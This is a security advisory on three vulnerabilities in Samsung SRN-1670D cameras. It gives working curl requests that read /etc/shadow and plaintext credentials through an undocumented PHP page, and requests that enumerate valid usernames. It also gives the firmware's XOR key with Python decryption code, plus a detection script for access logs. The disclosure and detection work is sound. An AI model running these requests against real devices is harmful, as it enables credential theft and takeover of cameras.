Multiple vulnerabilities in Samsung SRN cameras

Authors: Luca Giancane, Aristide Fattori (@joystick) and Roberto Paleari (@rpaleari)

We identified multiple security vulnerabilities that affect Samsung SRN cameras. These issues permit remote, unauthenticated attackers to gain full control over the device. We thank the CMU CERT for coordinating the disclosure process.

In detail, we identified three different security issues, described in the following sections.

Arbitrary file read (CVE-2015-8279)

Attackers can exploit an undocumented PHP page to read arbitrary local files. Exploitation is trivial: the attacker simply supplies the name of the requested file in a GET parameter.

As an example, the following request reads the local /etc/shadow file:

$ curl -v http://<target IP>/cslog_export.php?path=/etc/shadow

This vulnerability can be exploited to read the local file that stores the web interface credentials. On our test devices this file is located at /root/php_modules/lighttpd/sbin/userpw and contains both usernames and passwords in clear text, so no brute forcing is required.

Weak firmware encryption (CVE-2015-8281)

The device vendor lets customers download updated device software from its own web portal. However, the firmware images are encrypted with a proprietary scheme.

As an example, the initial bytes of the mproject_add_header.dtb file (contained in the downloadable firmware archive) include a header (EncryptFileFormat) indicating that the file is indeed encrypted:

$ xxd mproject_add_header.dtb  | head
00000000: 456e 6372 7970 7446 696c 6546 6f72 6d61  EncryptFileForma
00000010: 740a cdbb 53bd 4e6f 903e 7869 1af3 c98d  t...S.No.>xi....


However, looking at the file tail we observe a recurring byte pattern:

$ xxd mproject_add_header.dtb  | tail
000026e0: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
000026f0: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
00002700: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
00002710: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
00002720: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
00002730: e854 1db6 ad50 4e6f b70e 7869 1acb c98d  .T...PNo..xi....
...


Given that the file is encrypted, and assuming the vendor used a standard encryption scheme, only a few algorithms produce such a recurring pattern. The most obvious hypothesis is XOR encryption.

Since file tails are usually padded with zeroes, and XORing a zero byte yields the key byte unchanged, we speculated that the file had been XOR-encrypted with the 16-byte key e854 1db6 ad50 4e6f b70e 7869 1acb c98d. Decoding the file with this key successfully decrypted the firmware:

$ python ../decrypt.py mproject_add_header.dtb  | xxd | head
00000000: 9c5e d00d feed 0000 2730 0000 0038 0000  .^......'0...8..
00000010: 20b0 0000 0028 0000 0011 0000 0010 0000   ....(..........
00000020: 0000 0000 0280 0000 2078 0000 0000 0000  ........ x......
00000030: 0000 0000 0000 0000 0000 0000 0001 0000  ................
00000040: 0000 0000 0003 0000 000e 0000 0000 6673  ..............fs
00000050: 6c2c 6d70 6338 3533 3664 7300 0000 0000  l,mpc8536ds.....
00000060: 0003 0000 000e 0000 0006 6673 6c2c 6d70  ..........fsl,mp
00000070: 6338 3533 3664 7300 0000 0000 0003 0000  c8536ds.........
00000080: 0004 0000 0011 0000 0002 0000 0003 0000  ................
00000090: 0004 0000 0020 0000 0002 0000 0001 616c  ..... ........al


The very same XOR key can also be used to decrypt the other components of the device firmware. One of them contains an ext2 filesystem holding the contents of the device's main partition.
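The key-recovery and decryption steps described above, reconstructed as an added example that is not the authors' decrypt.py: it reads the 16-byte key from the zero-padded tail exactly as the reasoning above does, checks that the tail block actually repeats, and strips the 18-byte EncryptFileFormat marker before undoing the XOR. The sample image is constructed here; the keying by absolute file offset and the build_sample_image helper are assumptions based only on the dumps shown.

```python
# Constructed reproduction of the XOR scheme inferred from the dumps above; the sample
# image built here is synthetic and NOT the real Samsung firmware file.
HEADER = b"EncryptFileFormat\n"                          # clear-text 18-byte marker at offset 0
KEY = bytes.fromhex("e8541db6ad504e6fb70e78691acbc98d")  # 16-byte key read from the zero-padded tail
DTB_MAGIC = b"\xd0\x0d\xfe\xed"                          # flattened device tree magic seen after decryption

def xor_stream(data, key, base):
    """XOR `data` with `key`, keyed on the absolute file offset (base + i) mod len(key).
    Keying by file offset is what makes a 16-byte-aligned zero block encrypt to the key itself
    (assumption: consistent with the aligned repeating pattern in the xxd tail output)."""
    return bytes(b ^ key[(base + i) % len(key)] for i, b in enumerate(data))

def build_sample_image(payload, key=KEY):
    """Synthetic image: clear header, then payload XORed and zero-padded to a 16-byte boundary (+64)."""
    pad = (-(len(HEADER) + len(payload))) % 16 + 64
    return HEADER + xor_stream(payload + b"\x00" * pad, key, len(HEADER))

def recover_key(image, key_len=16):
    """Read the key from the tail: if the plaintext tail is zero padding, ciphertext == keystream.
    Requires the last aligned block to repeat at least once, as observed in the advisory's dump."""
    last = (len(image) // key_len - 1) * key_len
    block, prev = image[last:last + key_len], image[last - key_len:last]
    if block != prev:
        raise ValueError("tail does not repeat: not zero-padded XOR, or a different block alignment")
    return block

def decrypt(image):
    """Strip the clear-text header, recover the key from the tail and undo the XOR."""
    if not image.startswith(HEADER):
        raise ValueError("missing EncryptFileFormat header")
    key = recover_key(image)
    return xor_stream(image[len(HEADER):], key, len(HEADER))

# Constructed plaintext: DTB magic, a length word and a compatible string like the dump above.
SAMPLE_PAYLOAD = DTB_MAGIC + (0x2730).to_bytes(4, "big") + b"fsl,mpc8536ds\x00"

if __name__ == "__main__":
    import sys
    # Mirrors the advisory's usage: python decrypt.py <image> | xxd | head
    sys.stdout.buffer.write(decrypt(open(sys.argv[1], "rb").read()))
```

In the authors' dump the plaintext begins with 9c5e before d00dfeed because the header's trailing "t\n" (0x74 0x0a) was XORed with key bytes e8 54; stripping all 18 header bytes places the device-tree magic at offset 0.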

User enumeration (CVE-2015-8280)

Remote attackers can enumerate valid web interface usernames by submitting an invalid password and inspecting the returned error message.

As an example, when an invalid username is provided, the `Wrong ID` message is returned, as shown by the following request:

$ curl -d "data1=$(echo -n invalid | base64)&data2=x" http://<target IP>/login
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'/>
<script type='text/javascript' language='javascript'>
    alert("Wrong ID");
    top.location.href="./index.html";

However, when a valid username is provided, the `Wrong Password` message is returned instead, confirming that the username exists:

$ curl -d "data1=$(echo -n admin | base64)&data2=x" http://<target IP>/login
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'/>
<script type='text/javascript' language='javascript'>
    alert("Wrong Password");
    top.location.href="./index.html";
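As an added detection example (not part of the advisory), the following script flags the two request patterns described in the arbitrary file read and user enumeration sections: any hit on the undocumented cslog_export.php page (CVE-2015-8279) and bursts of POST /login attempts from a single source (CVE-2015-8280). It assumes web server access logs in Common Log Format; the sample lines are constructed, not captured from a device.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Common Log Format; NOT captured from a real device.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2015:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1834
10.0.0.9 - - [10/Dec/2015:10:01:10 +0000] "GET /cslog_export.php?path=/etc/shadow HTTP/1.1" 200 912
10.0.0.9 - - [10/Dec/2015:10:01:11 +0000] "GET /cslog_export.php?path=%2Froot%2Fphp_modules%2Flighttpd%2Fsbin%2Fuserpw HTTP/1.1" 200 64
10.0.0.7 - - [10/Dec/2015:10:02:00 +0000] "POST /login HTTP/1.1" 200 210
10.0.0.7 - - [10/Dec/2015:10:02:01 +0000] "POST /login HTTP/1.1" 200 210
10.0.0.7 - - [10/Dec/2015:10:02:01 +0000] "POST /login HTTP/1.1" 200 210
10.0.0.7 - - [10/Dec/2015:10:02:02 +0000] "POST /login HTTP/1.1" 200 210
10.0.0.7 - - [10/Dec/2015:10:02:02 +0000] "POST /login HTTP/1.1" 200 210
10.0.0.5 - - [10/Dec/2015:10:03:00 +0000] "POST /login HTTP/1.1" 200 210
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

def parse_line(line):
    """Split one CLF line into its fields, or return None for lines that do not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def find_file_reads(log_text):
    """(src, decoded path) for each hit on cslog_export.php. The page is not reachable from the
    normal web UI, so any request to it is suspicious regardless of the path requested."""
    hits = []
    for rec in map(parse_line, log_text.splitlines()):
        if not rec:
            continue
        url = urlsplit(rec["target"])
        if url.path.lower().endswith("/cslog_export.php"):
            path = parse_qs(url.query).get("path", [""])[0]  # parse_qs percent-decodes the value
            hits.append((rec["src"], path))
    return hits

def find_login_floods(log_text, threshold=5):
    """Sources issuing at least `threshold` POST /login requests. The device answers failed logins
    with HTTP 200 and an alert() page, so status codes cannot be used to count failures."""
    counts = Counter(
        rec["src"]
        for rec in map(parse_line, log_text.splitlines())
        if rec and rec["method"] == "POST" and urlsplit(rec["target"]).path == "/login"
    )
    return {src: n for src, n in counts.items() if n >= threshold}
```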


Affected models

We confirmed that the following device models are affected:
  • Samsung SRN-1670D (Web Viewer Version 1,0,0,193, Date Created 2013.10.26)
Other similar device models and software versions may also be affected, but they were not tested.
